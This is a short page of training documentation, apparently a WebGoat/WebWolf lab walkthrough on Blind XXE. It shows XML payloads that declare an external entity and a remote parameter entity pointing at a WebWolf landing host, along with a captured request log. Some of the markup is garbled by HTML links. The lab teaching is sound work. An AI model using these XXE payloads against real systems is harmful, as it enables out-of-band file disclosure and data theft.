A5:2021 | Security Misconfiguration (10) | Cycubix Docs
Blind XXE
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM '<a href="http://127.0.0.1:9090/WebWolf/landing" target="_blank" rel="noopener"><a href="http://127.0.0.1:9090/WebWolf/landing" class="bare">http://127.0.0.1:9090/WebWolf/landing</a></a>'><?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "webWolfLink:[webWolfLink]">
%remote;
]>
<comment>
<text>test&ping;</text>
</comment>{
"method" : "GET",
"path" : "/landing",
"headers" : {
"request" : {
"user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
},
},
"parameters" : {
"test" : [ "HelloWorld" ],
},
"timeTaken" : "1"
}PreviousA5:2021 | Security Misconfiguration (9) | Cycubix DocsNextA5:2021 | Security Misconfiguration (11) | Cycubix Docs
Last updated
Was this helpful?

